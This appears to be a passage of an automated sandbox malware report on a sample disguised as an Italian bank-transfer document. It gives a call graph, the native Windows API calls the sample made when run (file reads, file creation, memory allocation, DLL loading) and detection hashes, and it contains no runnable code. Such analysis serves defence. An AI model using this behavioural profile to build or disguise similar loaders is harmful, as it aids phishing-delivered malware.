4143c6 93045->93047 93046->93047 93047->92571 93049 408a79 93048->93049 93084 4087a0 93048->93084 93051 408a9d 93049->93051 93052 4087a0 19 API calls 93049->93052 93051->92573 93053 408a8a 93052->93053 93053->93051 93102 40f710 10 API calls 93053->93102 93056 41af60 LdrLoadDll 93055->93056 93057 41a51c 93056->93057 93221 1102e80 LdrInitializeThunk 93057->93221 93058 40c322 93060 40f4a0 93058->93060 93061 40f4bd 93060->93061 93222 419fc0 93061->93222 93064 40f505 93064->92577 93065 41a010 2 API calls 93066 40f52e 93065->93066 93066->92577 93068 41af60 LdrLoadDll 93067->93068 93069 41a02c 93068->93069 93228 1102d10 LdrInitializeThunk 93069->93228 93070 40c385 93070->92583 93070->92586 93073 41af60 LdrLoadDll 93072->93073 93074 41a07c 93073->93074 93229 1102d30 LdrInitializeThunk 93074->93229 93075 40c459 93075->92594 93078 41af60 LdrLoadDll 93077->93078 93079 419e3c 93078->93079 93230 1102fb0 LdrInitializeThunk 93079->93230 93080 40c4ac 93080->92598 93082->93044 93083->93042 93085 407ea0 4 API calls 93084->93085 93089 4087ba 93084->93089 93085->93089 93086 408a49 93086->93049 93087 408a3f 93088 408160 2 API calls 93087->93088 93088->93086 93089->93086 93089->93087 93092 419f00 2 API calls 93089->93092 93096 40c4c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 93089->93096 93099 419e20 2 API calls 93089->93099 93100 41a490 LdrLoadDll NtClose 93089->93100 93103 419d10 93089->93103 93106 4085d0 93089->93106 93118 40f5f0 LdrLoadDll NtClose 93089->93118 93119 419d90 LdrLoadDll 93089->93119 93120 419dc0 LdrLoadDll 93089->93120 93121 419e50 LdrLoadDll 93089->93121 93122 4083a0 93089->93122 93138 405f60 LdrLoadDll 93089->93138 93092->93089 93096->93089 93099->93089 93100->93089 93102->93051 93104 41af60 LdrLoadDll 93103->93104 93105 419d2c 93104->93105 93105->93089 93107 4085e6 93106->93107 93139 419880 93107->93139 93109 4085ff 93114 408771 93109->93114 93160 4081a0 93109->93160 93111 4086e5 93112 4083a0 11 API calls 93111->93112 93111->93114 93113 408713 93112->93113 93113->93114 93115 419f00 2 API calls 93113->93115 93114->93089 93116 408748 93115->93116 93116->93114 93117 41a500 2 API calls 93116->93117 93117->93114 93118->93089 93119->93089 93120->93089 93121->93089 93123 4083c9 93122->93123 93200 408310 93123->93200 93126 41a500 2 API calls 93127 4083dc 93126->93127 93127->93126 93128 408467 93127->93128 93130 408462 93127->93130 93208 40f670 93127->93208 93128->93089 93129 41a490 2 API calls 93131 40849a 93129->93131 93130->93129 93131->93128 93132 419d10 LdrLoadDll 93131->93132 93133 4084ff 93132->93133 93133->93128 93212 419d50 93133->93212 93135 408563 93135->93128 93136 414a50 8 API calls 93135->93136 93137 4085b8 93136->93137 93137->93089 93138->93089 93140 41bf90 2 API calls 93139->93140 93141 419897 93140->93141 93167 409310 93141->93167 93143 4198b2 93144 4198f0 93143->93144 93145 4198d9 93143->93145 93148 41bd40 2 API calls 93144->93148 93146 41bdc0 2 API calls 93145->93146 93147 4198e6 93146->93147 93147->93109 93149 41992a 93148->93149 93150 41bd40 2 API calls 93149->93150 93151 419943 93150->93151 93157 419be4 93151->93157 93173 41bd80 93151->93173 93154 419bd0 93155 41bdc0 2 API calls 93154->93155 93156 419bda 93155->93156 93156->93109 93158 41bdc0 2 API calls 93157->93158 93159 419c39 93158->93159 93159->93109 93161 40829f 93160->93161 93162 4081b5 93160->93162 93161->93111 93162->93161 93163 414a50 8 API calls 93162->93163 93164 408222 93163->93164 93165 41bdc0 2 API calls 93164->93165 93166 408249 93164->93166 93165->93166 93166->93111 93168 409335 93167->93168 93169 40acf0 LdrLoadDll 93168->93169 93170 409368 93169->93170 93172 40938d 93170->93172 93176 40cf20 93170->93176 93172->93143 93194 41a580 93173->93194 93177 40cf4c 93176->93177 93178 41a1e0 LdrLoadDll 93177->93178 93179 40cf65 93178->93179 93180 40cf6c 93179->93180 93187 41a220 93179->93187 93180->93172 93184 40cfa7 93185 41a490 2 API calls 93184->93185 93186 40cfca 93185->93186 93186->93172 93188 41a23c 93187->93188 93189 41af60 LdrLoadDll 93187->93189 93193 1102ca0 LdrInitializeThunk 93188->93193 93189->93188 93190 40cf8f 93190->93180 93192 41a810 LdrLoadDll 93190->93192 93192->93184 93193->93190 93195 41af60 LdrLoadDll 93194->93195 93196 41a59c 93195->93196 93199 1102f90 LdrInitializeThunk 93196->93199 93197 419bc9 93197->93154 93197->93157 93199->93197 93201 408328 93200->93201 93202 40acf0 LdrLoadDll 93201->93202 93203 408343 93202->93203 93204 414e50 LdrLoadDll 93203->93204 93205 408353 93204->93205 93206 40835c PostThreadMessageW 93205->93206 93207 408370 93205->93207 93206->93207 93207->93127 93209 40f683 93208->93209 93215 419e90 93209->93215 93213 41af60 LdrLoadDll 93212->93213 93214 419d6c 93213->93214 93214->93135 93216 419eac 93215->93216 93217 41af60 LdrLoadDll 93215->93217 93220 1102dd0 LdrInitializeThunk 93216->93220 93217->93216 93218 40f6ae 93218->93127 93220->93218 93221->93058 93223 41af60 LdrLoadDll 93222->93223 93224 419fdc 93223->93224 93227 1102f30 LdrInitializeThunk 93224->93227 93225 40f4fe 93225->93064 93225->93065 93227->93225 93228->93070 93229->93075 93230->93080

                                  Executed Functions

                                  Function 0041A410 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 41a410-41a426 1 41a42c-41a459 NtReadFile 0->1 2 41a427 call 41af60 0->2 2->1
                                  APIs
                                  • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID: 1JA$rMA$rMA
                                  • API String ID: 2738559852-782607585
                                  • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                  • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                                  • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                  • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                  Function 0041A40A Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 33filenativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 3 41a40a-41a459 call 41af60 NtReadFile
                                  APIs
                                  • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID: 1JA$rMA$rMA
                                  • API String ID: 2738559852-782607585
                                  • Opcode ID: 04ce376e678edcdb9751289a0f82548d436417c29a13e682c939fe5dcdc6d76c
                                  • Instruction ID: b0d4b4de7d76c8bf591afcef4104654b5335bd7ab6703c25e51113693fc8203e
                                  • Opcode Fuzzy Hash: 04ce376e678edcdb9751289a0f82548d436417c29a13e682c939fe5dcdc6d76c
                                  • Instruction Fuzzy Hash: B1F01DB6200149ABCB04DF98D990CEB77ADFF8C314B15864DF95D97201C634E8558BA4
                                  Function 0040ACF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 219 40acf0-40ad0c 220 40ad14-40ad19 219->220 221 40ad0f call 41cc50 219->221 222 40ad1b-40ad1e 220->222 223 40ad1f-40ad2d call 41d070 220->223 221->220 226 40ad3d-40ad4e call 41b4a0 223->226 227 40ad2f-40ad3a call 41d2f0 223->227 232 40ad50-40ad64 LdrLoadDll 226->232 233 40ad67-40ad6a 226->233 227->226 232->233
                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                  • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                                  • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                  • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
                                  Function 0041A35A Relevance: 1.5, APIs: 1, Instructions: 44filenativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 234 41a35a-41a3b1 call 41af60 NtCreateFile
                                  APIs
                                  • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: b7c82dd204dac21fe647372479e01c61b9d40f16f17e88d6db4b886f29bcc5fb
                                  • Instruction ID: 159411f34822f584cba13318e380b0e6d4baf2e06112cf03047d7a0e9d554c69
                                  • Opcode Fuzzy Hash: b7c82dd204dac21fe647372479e01c61b9d40f16f17e88d6db4b886f29bcc5fb
                                  • Instruction Fuzzy Hash: 4401EFB2201208AFCB48CF88CC81EEB37E9AF8C754F158609FA0DD7241D630E8518BA0
                                  Function 0041A360 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 243 41a360-41a376 244 41a37c-41a3b1 NtCreateFile 243->244 245 41a377 call 41af60 243->245 245->244
                                  APIs
                                  • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                  • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                                  • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                  • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                  Function 0041A540 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 246 41a540-41a57d call 41af60 NtAllocateVirtualMemory
                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                  • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                                  • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                  • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                                  Function 0041A490 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 258 41a490-41a4b9 call 41af60 NtClose
                                  APIs
                                  • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                  • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                                  • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                  • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                                  Function 01102B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 1eb63bc0a31705b8b50c71cf350c5bbdaf0718040e10bc9fba9c1a85ea39fc92
                                  • Instruction ID: 380b514f1b228bc081d75c17ae9254c2119d2321acb5c64e8da0945d2a3bd4e4
                                  • Opcode Fuzzy Hash: 1eb63bc0a31705b8b50c71cf350c5bbdaf0718040e10bc9fba9c1a85ea39fc92
                                  • Instruction Fuzzy Hash: 9B90026224240003410971585514616900A97E1201B55C031E1015590DC72589916225
                                  Function 01102BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 1623aa7e25c4266ea722206d5babad02515c3f86758c16eb13be7d051b3a3ee7
                                  • Instruction ID: a97d590cc2441fe97374a348ef225c0c7b530a9c885c9f327d0efe79fc82d833
                                  • Opcode Fuzzy Hash: 1623aa7e25c4266ea722206d5babad02515c3f86758c16eb13be7d051b3a3ee7
                                  • Instruction Fuzzy Hash: 1090023224140803D1847158550464A500597D2301F95C025A0026654DCB158B5977A1
                                  Function 01102AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 4902618203c84a710a8302ec44253152e3bbfbddbe42948af5055c18d0b3a7cc
                                  • Instruction ID: bb80ee6a644a4d13a241bcf70687e77adda06130dc58ec189013a52a0ca52534
                                  • Opcode Fuzzy Hash: 4902618203c84a710a8302ec44253152e3bbfbddbe42948af5055c18d0b3a7cc
                                  • Instruction Fuzzy Hash: FA90043735140003010DF55C17045075047D7D7351355C031F1017550CD731CD715331
                                  Function 01102D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: ef9038fa33cb8374523abc3e5b788f83910b3f494c4b44705fac9a0ef2255aa6
                                  • Instruction ID: 47ec783c13350d00c6fecb8df1eda0765404297098ef74f093caedf616d7b3c8
                                  • Opcode Fuzzy Hash: ef9038fa33cb8374523abc3e5b788f83910b3f494c4b44705fac9a0ef2255aa6
                                  • Instruction Fuzzy Hash: 7390022A25340003D1847158650860A500597D2202F95D425A0016558CCB1589695321
                                  Function 01102D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 36c7e015217356c5cfe5b64f3738de4e8acae833bc7ffce00d284161325ef9a2
                                  • Instruction ID: 4d7fbd2b61014b47c020f5326d3fb0c5a9d228e24a8ab57affeee595efea0222
                                  • Opcode Fuzzy Hash: 36c7e015217356c5cfe5b64f3738de4e8acae833bc7ffce00d284161325ef9a2
                                  • Instruction Fuzzy Hash: 8D90022234140003D144715865186069005E7E2301F55D021E0415554CDB1589565322
                                  Function 01102DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 3da9618bc08cabd6d2e5eac18d1e773da2f57aa5b6f4fd2dfcabe849dffef6c1
                                  • Instruction ID: 07ec84986e349e873418cc0b275f2fe9209d884e2788ae7c54a8e750c7e0b0bb
                                  • Opcode Fuzzy Hash: 3da9618bc08cabd6d2e5eac18d1e773da2f57aa5b6f4fd2dfcabe849dffef6c1
                                  • Instruction Fuzzy Hash: D1900222282441535549B15855045079006A7E1241795C022A1415950CC7269956D721
                                  Function 01102DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 5d9a15aca7a36438eb376c6fb6c13252becdbb6ea120c165e6ce8087ae58d6c2
                                  • Instruction ID: 39b11356add0c70f76e2829180d6813ab33b9a01751b46f48a692bb2d15c2d5c
                                  • Opcode Fuzzy Hash: 5d9a15aca7a36438eb376c6fb6c13252becdbb6ea120c165e6ce8087ae58d6c2
                                  • Instruction Fuzzy Hash: 1390023224140413D11571585604707500997D1241F95C422A0425558DD7568A52A221
                                  Function 01102C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 19075f9873a5780692e6441f285d5579ced662d4f631586fe0f860834abf7306
                                  • Instruction ID: 909fc2b4ca3a4550b39ab19aeeb864a5ab6787f159b2023eaaf7fb7357fa332a
                                  • Opcode Fuzzy Hash: 19075f9873a5780692e6441f285d5579ced662d4f631586fe0f860834abf7306
                                  • Instruction Fuzzy Hash: B390023224148803D1147158950474A500597D1301F59C421A4425658DC79589917221
                                  Function 01102CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: a9959d85da86b3ab5e2137638980e18e2b1c316c6ca18cc34ce2e95ec515c454
                                  • Instruction ID: caf486c23f7d10561983d9f01938330bd44fdbd48d637f37d166cc29bba03e3c
                                  • Opcode Fuzzy Hash: a9959d85da86b3ab5e2137638980e18e2b1c316c6ca18cc34ce2e95ec515c454
                                  • Instruction Fuzzy Hash: 7F90023224140403D10475986508646500597E1301F55D021A5025555EC76589916231
                                  Function 01102F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 143ea26a7016b28d0bdc6de41927e2a7a9df05cfa115d433f718bf90c54bfc7b
                                  • Instruction ID: 8962f7a60ce07900451f513ede7e8aee07e69f896d8f36c8150418bfca071ff4
                                  • Opcode Fuzzy Hash: 143ea26a7016b28d0bdc6de41927e2a7a9df05cfa115d433f718bf90c54bfc7b
                                  • Instruction Fuzzy Hash: 9B90026238140443D10471585514B065005D7E2301F55C025E1065554DC719CD526226
                                  Function 01102F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: d1bbe75ac1d26b38237ee347b380b14c95d6ae1a7e2f65813a23d60f29fc8a72
                                  • Instruction ID: 13f29a008d4aff3de88beb20a29d6af7b8ac2b1267209e1b279975a7cb71e307
                                  • Opcode Fuzzy Hash: d1bbe75ac1d26b38237ee347b380b14c95d6ae1a7e2f65813a23d60f29fc8a72
                                  • Instruction Fuzzy Hash: 7390023224180403D1047158591470B500597D1302F55C021A1165555DC72589516671
                                  Function 01102FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: c9ca84d1653219d67429ab37186532159a4aea1bcc6977a0e86228c676d782ee
                                  • Instruction ID: c7573c559733c18d0b9ef95b84433b5540a2029404fa9d9445845791482fefe0
                                  • Opcode Fuzzy Hash: c9ca84d1653219d67429ab37186532159a4aea1bcc6977a0e86228c676d782ee
                                  • Instruction Fuzzy Hash: 42900222641400434144716899449069005BBE2211755C131A0999550DC75989655765
                                  Function 01102FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: ee1309f940c715a6792472719e8172cdfdab6eabba6b7d5c3241aef6d70dc973
                                  • Instruction ID: 1bcd6215ed89a47f4a9c973ee97d44075cf9abe8a4ec83358738595c0cacdc06
                                  • Opcode Fuzzy Hash: ee1309f940c715a6792472719e8172cdfdab6eabba6b7d5c3241aef6d70dc973
                                  • Instruction Fuzzy Hash: 3E900222251C0043D20475685D14B07500597D1303F55C125A0155554CCB1589615621
                                  Function 01102E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 1ba55a1bb788a991ed6b0fad3871edd9e8e5f6b902f69c1397ce42d7affe2970
                                  • Instruction ID: 6f7163a2a037d34a09574f2cdab892ab8aa50b620f195be909f9db5538d1929b
                                  • Opcode Fuzzy Hash: 1ba55a1bb788a991ed6b0fad3871edd9e8e5f6b902f69c1397ce42d7affe2970
                                  • Instruction Fuzzy Hash: 8B90022264140503D10571585504616500A97D1241F95C032A1025555ECB258A92A231
                                  Function 01102EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 96fa2e2cf2ec3f67bdb396eab522cdb9bebfa11cffcc1e19062e420e5ffc4a0d
                                  • Instruction ID: a2984a9d76550ab227d15d05a84e0b9cb3e1b4e89a737c2cafba31b589a276dc
